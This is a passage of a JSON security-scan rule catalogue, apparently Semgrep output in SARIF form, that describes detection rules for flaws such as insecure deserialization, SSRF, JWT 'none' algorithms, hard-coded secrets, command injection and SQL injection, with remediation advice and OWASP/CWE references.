Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","id":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","name":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","id":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","name":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg","id":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","name":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.jjwt.security.jwt-none-alg.jjwt-none-alg"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"help":{"markdown":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown)\n","text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","id":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","name":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"help":{"markdown":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop)\n - [https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n","text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","id":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","name":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","id":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","name":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"help":{"markdown":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.no-send.bad-send)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb)\n - [https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html](https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html)\n","text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.no-send.bad-send","id":"ruby.lang.security.no-send.bad-send","name":"ruby.lang.security.no-send.bad-send","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.no-send.bad-send"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"help":{"markdown":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure)\n - [https://golang.org/doc/go1.14#crypto/tls](https://golang.org/doc/go1.14#crypto/tls)\n - [https://www.us-cert.gov/ncas/alerts/TA14-290A](https://www.us-cert.gov/ncas/alerts/TA14-290A)\n","text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","id":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","name":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe","id":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","name":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-expat.security.audit.expat-xxe.expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"help":{"markdown":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled)\n - [https://stackoverflow.com/a/7442668](https://stackoverflow.com/a/7442668)\n","text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","id":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","name":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","properties":{"precision":"very-high","tags":["CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences","LOW CONFIDENCE","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","id":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","name":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","id":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","name":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","id":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","name":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"help":{"markdown":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","id":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","name":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","id":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","name":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","id":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","name":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain 